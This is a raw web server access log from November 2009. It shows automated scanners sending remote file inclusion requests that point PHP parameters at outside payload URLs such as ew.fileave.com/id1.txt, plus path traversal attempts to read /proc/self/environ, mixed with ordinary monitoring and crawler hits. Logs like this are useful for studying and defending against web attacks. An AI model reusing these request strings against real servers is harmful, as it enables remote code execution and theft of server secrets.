174.142.75.77 - - [26/Nov/2009:05:58:22 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.22.119.110 - - [26/Nov/2009:05:59:08 -0500] "GET /logs/error_log.Q109110500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
209.59.12.99 - - [26/Nov/2009:05:59:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.186.64.163 - - [26/Nov/2009:05:59:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:05:59:40 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:00:13 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:00:13 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:06:00:02 -0500] "GET /logs/error_log.Q109051900 HTTP/1.0" 200 3979160 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [26/Nov/2009:06:00:43 -0500] "GET /logs/access_log.Q109091100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:00:45 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:00:45 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:01:28 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:01:28 -0500] "GET //index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:01:54 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:01:58 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:06:01:40 -0500] "GET /logs/error_log.Q109061500 HTTP/1.0" 200 2959056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.186.64.163 - - [26/Nov/2009:06:02:16 -0500] "GET //index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:02:18 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:02:24 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:02:32 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:02:32 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:02:32 -0500] "GET /logs/access_log.Q109091100//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:03:23 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:04:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [26/Nov/2009:06:04:16 -0500] "GET /logs/error_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:04:45 -0500] "GET /logs/error_log.Q109062700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:05:38 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:05:44 -0500] "GET /logs/access_log.Q109110600%20%20//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:06:05:45 -0500] "GET /logs/error_log.Q109052200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [26/Nov/2009:06:05:45 -0500] "GET /logs/access_log.Q109091100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:05 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:05 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:06:05 -0500] "GET /logs//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:06:05 -0500] "GET /logs/error_log.Q109052200//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:06:05 -0500] "GET //zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:13 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:13 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:14 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:14 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:16 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:06:06:16 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:07:21 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:07:21 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:07:21 -0500] "GET /logs/error_log.Q109052200//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:07:26 -0500] "GET /logs/error_log.Q109062700%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:07:26 -0500] "GET /logs/error_log.Q109081300%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:07:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:07:39 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:07:40 -0500] "GET /logs/error_log.Q109061100//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:07:59 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:07:59 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:01 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:03 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:03 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:04 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:18 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:19 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:21 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:08:22 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:08:40 -0500] "GET /logs/error_log.Q109060900//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:06:08:50 -0500] "GET /logs/error_log.Q109060900//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:09:13 -0500] "GET /logs/access_log.Q109091100%20%20//include/bbs.lib.inc.php?site_path=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 251 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:09:13 -0500] "GET //include/bbs.lib.inc.php?site_path=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 222 "-" "Mozilla/5.0"
195.186.64.163 - - [26/Nov/2009:06:09:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://design.rightside.ru//appserv/all.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:09:16 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.210.84.226 - - [26/Nov/2009:06:09:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:09:47 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:09:47 -0500] "GET /logs/error_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:09:49 -0500] "GET //index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.84.226 - - [26/Nov/2009:06:09:49 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:09:50 -0500] "GET /logs/error_log.Q109062700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:09:50 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:10:17 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:10:20 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:10:22 -0500] "GET /logs/access_log.Q109093000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:06:10:31 -0500] "GET /logs/access_log.Q109082900//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.186.15.126 - - [26/Nov/2009:06:11:45 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg???? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
91.186.15.126 - - [26/Nov/2009:06:11:45 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg???? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
78.110.50.112 - - [26/Nov/2009:06:12:07 -0500] "GET /logs/access_log.Q109093000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:12:07 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:12:07 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:12:43 -0500] "GET /logs/error_log.Q109070400//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:12:43 -0500] "GET //include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:12:43 -0500] "GET /logs//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.234.200.183 - - [26/Nov/2009:06:12:57 -0500] "GET /include/bbs.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 221 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.183 - - [26/Nov/2009:06:12:57 -0500] "GET /logs/access_log.Q109091100/include/bbs.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.183 - - [26/Nov/2009:06:12:57 -0500] "GET /include/bbs.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 221 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.183 - - [26/Nov/2009:06:12:58 -0500] "GET /logs/access_log.Q109091100/include/bbs.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
78.110.50.112 - - [26/Nov/2009:06:13:14 -0500] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:14:05 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:14:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.112 - - [26/Nov/2009:06:14:18 -0500] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
88.230.181.203 - - [26/Nov/2009:06:15:43 -0500] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://open-saas.com//c.txt? HTTP/1.1" 404 232 "-" "Mozilla/3.0 (compatible; Indy Library)"
207.7.108.203 - - [26/Nov/2009:06:18:05 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:06:18:05 -0500] "GET /phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:06:18:21 -0500] "GET /phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:06:18:25 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:06:18:52 -0500] "GET /logs/access_log.Q109050800%20%20/phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:06:19:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.112 - - [26/Nov/2009:06:19:30 -0500] "GET /logs/access_log.Q109093000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
207.7.108.203 - - [26/Nov/2009:06:19:32 -0500] "GET /logs/access_log.Q109050800%20%20/phphtml.php?htmlclass_path=http://www.withkor.net/snapshot/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:06:19:41 -0500] "GET /logs/access_log.Q109093000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:20:10 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:20:10 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:06:19:36 -0500] "GET /logs/error_log.Q109081500 HTTP/1.0" 200 4212655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.50.55.226 - - [26/Nov/2009:06:20:53 -0500] "GET /logs/popup.php?path=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.50.55.226 - - [26/Nov/2009:06:20:53 -0500] "GET /logs/access_log.Q109053000/popup.php?path=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.50.55.226 - - [26/Nov/2009:06:20:53 -0500] "GET /popup.php?path=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
38.100.8.50 - - [26/Nov/2009:06:20:55 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:20:55 -0500] "GET / HTTP/1.1" 200 409 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:20:57 -0500] "GET /ACE.html HTTP/1.1" 200 5877 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:20:58 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "panscient.com"
78.110.50.112 - - [26/Nov/2009:06:20:59 -0500] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
38.100.8.50 - - [26/Nov/2009:06:20:59 -0500] "GET /logs/error_log.Q107070100 HTTP/1.1" 404 223 "-" "panscient.com"
78.110.50.112 - - [26/Nov/2009:06:21:00 -0500] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
38.100.8.50 - - [26/Nov/2009:06:21:00 -0500] "GET /logs/ HTTP/1.1" 200 27548 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:04 -0500] "GET /Includes/ HTTP/1.1" 200 220 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:07 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37789 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:09 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084315000303C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:13 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084813000323C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:14 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084516000313C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:16 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084F1A000383C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:17 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084D12000343C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:18 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:19 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143EF5084A1C000383C08J+M37+ENG HTTP/1.1" 500 197 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:19 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:20 -0500] "GET /index.htm HTTP/1.1" 200 870 "-" "panscient.com"
193.50.55.226 - - [26/Nov/2009:06:21:22 -0500] "GET /logs/access_log.Q109060400/popup.php?path=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
38.100.8.50 - - [26/Nov/2009:06:21:23 -0500] "GET / HTTP/1.1" 200 409 "-" "panscient.com"
174.142.75.77 - - [26/Nov/2009:06:21:34 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:21:40 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:21:40 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:06:21:43 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
38.100.8.50 - - [26/Nov/2009:06:21:56 -0500] "GET /ACE.html HTTP/1.1" 200 5877 "-" "panscient.com"
38.100.8.50 - - [26/Nov/2009:06:21:58 -0500] "GET /index.htm HTTP/1.1" 200 870 "-" "panscient.com"
200.234.200.157 - - [26/Nov/2009:06:22:10 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
